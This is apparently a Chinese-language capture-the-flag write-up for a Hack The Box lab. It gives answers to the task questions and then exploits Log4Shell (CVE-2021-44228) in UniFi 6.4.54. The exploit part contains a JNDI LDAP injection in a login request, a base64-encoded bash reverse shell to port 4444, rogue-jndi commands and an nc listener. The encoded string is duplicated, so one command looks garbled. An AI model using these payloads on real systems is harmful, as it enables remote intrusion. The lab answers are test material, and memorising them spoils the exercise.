Task 1
Q:What ports are open?
┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.248.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 16:50 CST
Nmap scan report for 10.129.248.11
Host is up (0.50s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
8443/tcp open ssl/nagios-nsca Nagios NSCA/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.90 secondsnmap扫一下立刻出结果!
A:22,6789,8080,8443
Task 2
Q:Name of the software that is running on the highest port?
namp通过端口没有识别出来,那么我们访问看看
Bad Request
This combination of host and port requires TLS.提示我们需要使用TSL协议,那么我们用https
访问
这个恐怕只能肉眼识别然后人工搜索是什么软件了==、
A:UniFI network
Task 3
Q:What is the version of the software that is running?
页面上的logo下面写了版本号==、
A:6.4.54
Task 4
Q:What is the CVE for the identified vulnerability?
搜索这个软件+版本号,得到一个漏洞是CVE-2021-44228
A:cve-2021-44228
Task 5
Q:What is the version of Maven that we installed?
A:3.6.3
Task 6
Q:What protocol does JNDI leverage in the injection?
A:ldap
Task 7
Q:What tool do we use to intercept the traffic, indicating the attack was successful?
A:tcpdump
Task 8
Q:What port do we need to inspect intercepted traffic for?
A:389
Task 9
Q:What port is the MongoDB service running on?
A:27117
Task 10
Q:What is the default database name for UniFi applications?
A:ace
Task 11
Q:What is the function we use to enumerate users within the database in MongoDB?
A:db.admin.find()
Task 12
Q:What is the function to add data to the database in MongoDB?
A:db.admin.insert()
Task 13
Q:What is the function we use to update users within the database in MongoDB?
A:db.admin.update()
Task 14
Q:What is the password for the root user?
A:
Flag
上来首先nmap扫一下端口
发现那个服务,这个在前面的题里面写了
得到CMS之后就去查对应的漏洞
得到漏洞是cve-2021-44228
我们直接查这个漏洞的文章,对他利用
首先先打开流量监听sudo tcpdump -i tun0
进去登录的时候直接抓包
在remember
里面填充log4j2的payload
POST /api/login HTTP/1.1
Host: 10.129.96.149:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage
Content-Type: application/json; charset=utf-8
Origin: https://10.129.96.149:8443
Content-Length: 71
Te: trailers
Connection: close
{"username":"admin","password":"123456","remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true}payload里面的IP改成自己的网卡IP
这样如果存在这个漏洞的话就会返回链接
我们放掉这个包,就能看到tcpdump里面出现了数据
说明进行了回连
那就确定了这个有log4j的漏洞
那么我们需要构建一个class包了
我们首先下载maven
┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# apt install maven 安装好了之后下载一个写好的exp
https://github.com/veracode-research/rogue-jndi
进去文件夹之后直接`mvn package
打包这个
打包结束后会提示你`BUILD SUCCESS`
接着我们获取反弹payload的bash64 加密
┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# echo 'bash -c bash -i >&/dev/tcp/10.10.16.61/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==
接着我们把服务启动一下
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuOTYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.16.61"
监听4444端口
nc -lnvp 4444